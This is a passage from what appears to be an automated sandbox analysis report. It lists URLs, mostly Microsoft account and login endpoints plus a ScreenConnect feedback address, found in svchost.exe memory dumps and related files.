                  Source: svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 0000000E.00000002.3155342046.000002094E437000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
                  Source: ScreenConnect.Core.dll0.1.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                  Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                  Source: svchost.exe, 00000004.00000003.1295464870.0000019A7F000000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                  Source: svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live
                  Source: svchost.exe, 0000000E.00000003.1878648400.000002094F289000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3157985888.000002094F21D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                  Source: svchost.exe, 0000000E.00000003.1698718052.000002094ED56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                  Source: svchost.exe, 0000000E.00000003.1698718052.000002094ED56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                  Source: svchost.exe, 0000000E.00000003.1698545456.000002094ED6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                  Source: svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502ttps
                  Source: svchost.exe, 0000000E.00000003.1698545456.000002094ED6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                  Source: svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600ive.
                  Source: svchost.exe, 0000000E.00000003.1698545456.000002094ED6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698219169.000002094ED2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                  Source: svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601PAdd
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3157747586.000002094ED37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                  Source: svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf.srf
                  Source: svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srfP
                  Source: svchost.exe, 0000000E.00000002.3157985888.000002094F21D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155833011.000002094E49F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3157944399.000002094F200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3157747586.000002094ED37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                  Source: svchost.exe, 0000000E.00000002.3158220210.000002094F299000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srfA7826
                  Source: svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srfice
                  Source: svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3157747586.000002094ED37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                  Source: svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698545456.000002094ED6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698276835.000002094ED10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srft
                  Source: svchost.exe, 0000000E.00000003.1698545456.000002094ED6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                  Source: svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srfesign
                  Source: svchost.exe, 0000000E.00000003.1698574319.000002094ED27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srff
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 0000000E.00000003.1698545456.000002094ED6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698574319.000002094ED27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf:CPAddUserI
                  Source: svchost.exe, 0000000E.00000003.1698545456.000002094ED6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 0000000E.00000003.1698574319.000002094ED27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srfX
                  Source: svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srfps://lo
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                  Source: svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
                  Source: svchost.exe, 0000000E.00000003.1698545456.000002094ED6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                  Source: svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srfAuthUp
                  Source: svchost.exe, 0000000E.00000003.1698545456.000002094ED6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698219169.000002094ED2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                  Source: svchost.exe, 0000000E.00000003.1890577139.000002094ED5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3158021813.000002094F268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-DgjCh4qtTQBle0vxnfFIFAM3wJbOOfUHVnXxyEko
                  Source: svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srfg:CPCha
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698718052.000002094ED56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                  Source: svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                  Source: svchost.exe, 0000000E.00000002.3158021813.000002094F24B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698545456.000002094ED6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                  Source: svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf//login.li
                  Source: svchost.exe, 0000000E.00000003.1698219169.000002094ED2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                  Source: svchost.exe, 0000000E.00000003.1912726200.000002094ED6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfssue
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                  Source: svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600Issuer
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698718052.000002094ED56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                  Source: svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601Issuer
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                  Source: svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                  Source: svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                  Source: svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                  Source: svchost.exe, 0000000E.00000002.3155342046.000002094E437000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                  Source: svchost.exe, 0000000E.00000002.3155342046.000002094E437000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                  Source: svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                  Source: svchost.exe, 0000000E.00000003.1698295424.000002094ED5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698219169.000002094ED2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                  Source: svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srfom
                  Source: svchost.exe, 0000000E.00000003.1698276835.000002094ED10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155342046.000002094E437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                  Source: svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srfce
                  Source: svchost.exe, 0000000E.00000002.3156571081.000002094E4CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3158220210.000002094F281000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                  Source: svchost.exe, 0000000E.00000002.3158220210.000002094F281000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srfityCRL
                  Source: svchost.exe, 0000000E.00000002.3157747586.000002094ED37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srfn#
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf
                  Source: svchost.exe, 0000000E.00000003.1698276835.000002094ED10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
